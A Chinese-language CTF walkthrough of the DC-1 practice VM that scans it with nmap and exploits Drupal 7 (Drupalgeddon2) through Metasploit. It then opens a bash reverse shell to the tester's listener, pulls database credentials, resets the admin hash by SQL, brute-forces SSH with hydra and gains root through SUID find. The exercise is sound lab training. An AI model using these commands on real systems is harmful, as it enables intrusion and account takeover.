渗透测试实战-DC-1

news/2025/1/9 3:19:37/

firewall-cmd –reload


DC-1 靶机实战

打开测试靶机DC-1

查看网络配置,及网卡

靶机使用NAT 模式,得到其MAC地址

使用nmap 工具扫描内网网段

nmap -sP 192.168.1.144/24 -oN nmap.Sp

MAC 对照得到其IP地址

对其详细进行扫描

nmap -A 192.168.1.158 -p 1-65535 -oN nmap.A

可以看到其80 22 端口都是开放的

80端口下,我们可以看到其网站的模板为:Drupal 7

22   爆破

80   drupal    CMS

国外三大PHP CMS 之一

drupal

wordpress

joomla

80端口开放,我们可以使用浏览器直接访问IP地址

MSF

通过使用MSF 直接搜索该网站模板存在的漏洞

启动

msfconsole

search drupal

使用该攻击模块

通过查看References来查看该漏洞的详细信息;

References:

  https://cvedetails.com/cve/CVE-2018-7600/

  https://www.drupal.org/sa-core-2018-002

  https://greysec.net/showthread.php?tid=2912

  https://research.checkpoint.com/uncovering-drupalgeddon-2/

  https://github.com/a2u/CVE-2018-7600

  https://github.com/nixawk/labs/issues/19

  https://github.com/FireFart/CVE-2018-7600

选择攻击载荷

set payload php/meterpreter/reverse_tcp

缺少目标地址,源地址

添加

set RHOSTS 192.168.1.158

set LHOST 192.168.1.150

攻击

拿到shell

flag1

Every good CMS needs a config file - and so do you.

这句话 指引我们,应该去找的该网站的配置文件

所在目录:

sites/default/

flag2

cat sites/default/settings.php

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'host' => 'localhost',

shell

进入交互式界面

尝试进行数据库连接

mysql -udbuser -pR0ck3t

连接失败

考虑反弹shell

反弹shell

本地监听2333端口

nc -lvvp 2333

bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

直接反弹失败

借助python 反弹

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@DC-1:/var/www/sites/default$ bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

反弹成功

登录数据库

尝试在反弹shell 下执行连接数据库

还是失败了

但是我们发现有意思的事情,我们在kali 本机的python 交互式环境下可以成功连接到数据库

www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t

登入成功

进入数据库drupladb

查询users数据表

select * from users\G

重置后台管理员密码

重置admin 用户密码

这里我们破解admin 用户密码要耗费时间,我们可以考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

php scripts/password-hash.sh admin

password: admin                 hash: $S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt

更新users

update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

更新成功

flag3

提示我们 etc/passwd

flag4

可以看到我们的flag4 用户是可以登录的

接下来我们使用hydra 爆破,该用户密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.158 ssh -vV -f -o hydra.ssh

我们进入/root 家目录,发现没有权限

是否有一些命令具有SUID 标志

find / -perm -4000 2>/dev/null

利用操作系统内核提权

mkdir

find GGG -exec "whoami" \;

find GGG -exec "/bin/sh" \;

测试完成



http://www.ppmy.cn/news/1561118.html

相关文章

.net core三种依赖注入方式,原生的依赖注入器,scrutor,autofac

在 .NET Core 中,依赖注入(DI)是一个核心特性,它允许你管理应用程序中对象的生命周期和依赖关系。默认情况下,.NET Core 提供了一个内置的 DI 容器,但你也可以选择扩展它,或者使用第三方 DI 框架…

Linux 防火墙:守护系统安全的坚固防线

Linux 防火墙:守护系统安全的坚固防线 在网络环境日益复杂的当下,Linux 系统的安全性愈发关键,而防火墙作为抵御外部网络威胁的首道屏障,扮演着举足轻重的角色。本文将带你深入了解 Linux 防火墙的方方面面,从基础概念…

后端Java开发:第九天

第九天:Java基础语法 - 数组 今天我们将深入学习 Java 中的数组。数组是编程中非常重要的一个概念,它让你能够存储多个数据,并通过索引来访问这些数据。数组在数据处理、算法和程序优化中发挥着至关重要的作用。了解数组的基本概念、如何使用…

【Leetcode 每日一题】731. 我的日程安排表 II

问题背景 实现一个程序来存放你的日程安排。如果要添加的时间内不会导致三重预订时,则可以存储这个新的日程安排。 当三个日程安排有一些时间上的交叉时(例如三个日程安排都在同一时间内),就会产生 三重预订 。 事件能够用一对整…

MySQL(五)MySQL图形化工具-Navicat

1. MySQL图形化工具-Navicat Navicat是一套快速、可靠的数据库管理工具,Navicat是以直觉化的图形用户界面而建的,可以兼容多种数据库,支持多种操作系统。   Navicat for MySQL是一款强大的 MySQL 数据库管理和开发工具,它为专业…

微信小程序:封装request请求

1、定义一个request.js类 // utils/request.js const app getApp();function requestWithToken(url, method GET, data {}) {return new Promise((resolve, reject) > {// 发送请求wx.request({url: app.globalData.position url,header: {"Content-Type": &…

在 macOS 上,你可以使用系统自带的 终端(Terminal) 工具,通过 SSH 协议远程连接服务器

文章目录 1. 打开终端2. 使用 SSH 命令连接服务器3. 输入密码4. 连接成功5. 使用密钥登录(可选)6. 退出 SSH 连接7. 其他常用 SSH 选项8. 常见问题排查问题 1:连接超时问题 2:权限被拒绝(Permission denied&#xff09…

项目优化之策略模式

目录 策略模式基本概念 策略模式的应用场景 实际项目中具体应用 项目背景: 策略模式解决方案: 计费模块策略模式简要代码 策略模式基本概念 策略模式(Strategy Pattern) 是一种行为型设计模式,把算法的使用放到环境类中,而算…